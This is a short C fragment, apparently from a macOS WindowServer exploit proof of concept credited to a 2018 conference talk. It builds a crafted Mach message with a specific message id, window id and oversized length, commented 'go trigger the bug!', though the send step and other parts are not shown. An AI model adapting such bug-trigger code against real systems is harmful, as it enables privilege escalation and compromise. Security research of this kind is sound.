CGWindowID r[2] = {0};
//...
mach_msg_return_t ret;
msg_t message;

mach_port_t replyPort = mig_get_reply_port();

//go trigger the bug!
memset(&message, 0, sizeof(message));
message.header.msgh_remote_port = getport;
message.header.msgh_local_port = replyPort;
message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
message.header.msgh_size = 40;
message.header.msgh_id = 0x7210 + 0xc8;

message.NDR = NDR_record;
message.wid = r[0];
message.length = 0x2010;




reference : zer0con2018_singi
